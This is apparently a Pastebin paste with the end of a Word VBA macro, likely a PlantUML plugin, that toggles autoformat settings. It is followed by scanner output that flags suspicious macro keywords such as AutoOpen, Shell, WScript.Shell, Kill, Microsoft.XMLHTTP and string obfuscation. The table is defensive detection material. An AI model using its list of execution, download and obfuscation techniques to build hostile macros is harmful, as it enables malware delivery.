  877. Sub AutoFormatOff()
  878.     ' disable worst of MS Word autoformatting options
  879.    With options
  880.         .AutoFormatAsYouTypeReplaceQuotes = False
  881.         .AutoFormatAsYouTypeReplaceSymbols = False
  882.         .AutoFormatAsYouTypeReplacePlainTextEmphasis = False
  883.         .AutoFormatAsYouTypeDefineStyles = False
  884.         .TabIndentKey = True
  885.     End With
  886. End Sub
  887.  
  888. Sub AutoFormatOn()
  889.     ' enable disabled MS Word autoformatting options
  890.    With options
  891.         .AutoFormatAsYouTypeReplaceQuotes = True
  892.         .AutoFormatAsYouTypeReplaceSymbols = True
  893.         .AutoFormatAsYouTypeReplacePlainTextEmphasis = True
  894.         .AutoFormatAsYouTypeDefineStyles = True
  895.         .TabIndentKey = True
  896.     End With
  897. End Sub
  898.  
  899.  
  900. +------------+----------------------+-----------------------------------------+
  901. | Type       | Keyword              | Description                             |
  902. +------------+----------------------+-----------------------------------------+
  903. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  904. | Suspicious | Kill                 | May delete a file                       |
  905. | Suspicious | Open                 | May open a file                         |
  906. | Suspicious | Shell                | May run an executable file or a system  |
  907. |            |                      | command                                 |
  908. | Suspicious | vbMinimizedFocus     | May run an executable file or a system  |
  909. |            |                      | command                                 |
  910. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  911. |            |                      | command                                 |
  912. | Suspicious | Run                  | May run an executable file or a system  |
  913. |            |                      | command                                 |
  914. | Suspicious | Shell.Application    | May run an application (if combined     |
  915. |            |                      | with CreateObject)                      |
  916. | Suspicious | CreateObject         | May create an OLE object                |
  917. | Suspicious | CallByName           | May attempt to obfuscate malicious      |
  918. |            |                      | function calls                          |
  919. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  920. |            |                      | strings                                 |
  921. | Suspicious | ADODB.Stream         | May create a text file                  |
  922. | Suspicious | WriteText            | May create a text file                  |
  923. | Suspicious | SaveToFile           | May create a text file                  |
  924. | Suspicious | Environ              | May read system environment variables   |
  925. | Suspicious | Write                | May write to a file (if combined with   |
  926. |            |                      | Open)                                   |
  927. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  928. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  929. |            |                      | be used to obfuscate strings (option    |
  930. |            |                      | --decode to see all)                    |
  931. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  932. |            |                      | may be used to obfuscate strings        |
  933. |            |                      | (option --decode to see all)            |
  934. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  935. |            | Strings              | may be used to obfuscate strings        |
  936. |            |                      | (option --decode to see all)            |
  937. | IOC        | 127.0.0.1            | IPv4 address                            |
  938. | IOC        | plantuml.jar         | Executable file name                    |
  939. | IOC        | dot.exe              | Executable file name                    |
  940. | IOC        | plantumlskins.jar    | Executable file name                    |
  941. | VBA string | %%APPDATA%%          | Environ("%APPDATA%")                    |
  942. | VBA string | %GRAPHVIZ_DOT%       | Environ("GRAPHVIZ_DOT")                 |
  943. | VBA string | TE                   | "T" & "E"                               |
  944. | VBA string | MP                   | "" + "MP"                               |
  945. | VBA string | \plantum.            | "\" + "plantum."                        |
  946. | VBA string |
  947.                     | Chr(13)                                 |
  948. | VBA string |  -Dplantuml.include. | " -Dplantuml.include.path=" & Chr(34)   |
  949. |            | path="               |                                         |
  950. | VBA string | "                    | Chr(34) & " "                           |
  951. +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!